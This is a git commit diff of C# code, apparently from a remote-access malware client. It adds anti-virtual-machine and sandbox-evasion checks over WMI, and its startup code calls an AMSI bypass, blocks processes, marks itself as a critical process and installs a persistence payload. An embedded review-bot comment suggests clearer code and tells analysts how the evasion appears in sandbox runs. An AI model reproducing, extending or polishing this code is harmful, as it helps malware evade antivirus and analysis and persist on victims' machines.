qwqdanchun 2021-10-10 21:15:51 +08:00
parent 09973e7a64
commit 38ed9013d9
2 changed files with 73 additions and 19 deletions


@ -1,11 +1,6 @@
using System;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Management;
using System.Net.NetworkInformation;
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
using System.Threading;
namespace Client.Helper
@ -15,21 +10,61 @@ namespace Client.Helper
{
public static void RunAntiAnalysis()
{
if (isVM_by_wim_temper())
if (!IsServerOS()&&isVM_by_wim_temper() )
{
Environment.FailFast(null);
}
Thread.Sleep(1000);
}
public static bool IsServerOS()
{
try
{
string computerName = Environment.MachineName;
ConnectionOptions options = new ConnectionOptions() { EnablePrivileges = true, Impersonation = ImpersonationLevel.Impersonate };
ManagementScope scope = new ManagementScope(string.Format(@"\\{0}\root\CIMV2", computerName), options);
ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_OperatingSystem");
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query))
using (ManagementObjectCollection results = searcher.Get())
{
if (results.Count != 1) throw new ManagementException();
uint productType = (uint)results.OfType<ManagementObject>().First().Properties["ProductType"].Value;
switch (productType)
{
case 1:
return false;
case 2:
return true;
case 3:
return true;
default:
return false;
}
}
}
catch
{
return false;
}
}
public static bool isVM_by_wim_temper()
{
SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory");
//SelectQuery selectQuery = new SelectQuery("Select * from CIM_Memory");
ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
int i = 0;
foreach (ManagementObject DeviceID in searcher.Get())
i++;
return (i < 2);
{
try
{
SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory");
//SelectQuery selectQuery = new SelectQuery("Select * from CIM_Memory");
ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
int i = 0;
foreach (ManagementObject DeviceID in searcher.Get())
i++;
return (i < 2);
}
catch
{
return true;
}
}
}
}
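Review bot: The `ProductType` switch in `IsServerOS` uses bare 1/2/3 with no comment; a line such as `// Win32_OperatingSystem.ProductType: 1 = workstation, 2 = domain controller, 3 = server` would make it readable that the virtual-machine check in `RunAntiAnalysis` now applies to workstation systems only. For analysts, what appears to be the new side is a recognisable sequence: a WMI query of `Win32_OperatingSystem`, an instance count over `Win32_CacheMemory`, then `Environment.FailFast(null)`, which on .NET Framework terminates the process after writing to the Windows Application event log. Both bare `catch` blocks hide WMI errors, and the one in `isVM_by_wim_temper` returns true, so a workstation where the query throws takes the same exit path as a detected VM. An immediate crash in a sandbox run is therefore better read as environment gating than as a broken sample, and the absence of later behaviour in that report says nothing about what the binary does on a host that passes the check.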


@ -16,24 +16,43 @@ namespace Client
}
if (!Settings.InitializeSettings()) Environment.Exit(0);
try
{
if (Convert.ToBoolean(Settings.An_ti)) //run anti-virtual environment
Anti_Analysis.RunAntiAnalysis();
}
catch { }
A.B();//Amsi Bypass
try
{
if (!MutexControl.CreateMutex()) //if current payload is a duplicate
Environment.Exit(0);
}
catch { }
try
{
if (Convert.ToBoolean(Settings.Anti_Process)) //run AntiProcess
AntiProcess.StartBlock();
}
catch { }
try
{
if (Convert.ToBoolean(Settings.BS_OD) && Methods.IsAdmin()) //active critical process
ProcessCritical.Set();
}
catch { }
try
{
if (Convert.ToBoolean(Settings.In_stall)) //drop payload [persistence]
NormalStartup.Install();
Methods.PreventSleep(); //prevent pc to idle\sleep
}
catch { }
Methods.PreventSleep(); //prevent pc to idle\sleep
try
{
if (Methods.IsAdmin())
Methods.ClearSetting();
A.B();//Amsi Bypass
}
catch { }